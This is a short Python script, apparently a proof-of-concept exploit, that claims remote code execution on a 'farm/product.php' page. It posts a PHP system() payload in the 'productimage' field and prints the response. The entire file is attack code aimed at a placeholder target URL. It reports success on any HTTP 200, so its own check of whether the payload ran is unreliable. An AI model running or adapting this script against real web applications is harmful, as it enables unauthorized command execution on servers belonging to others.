import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)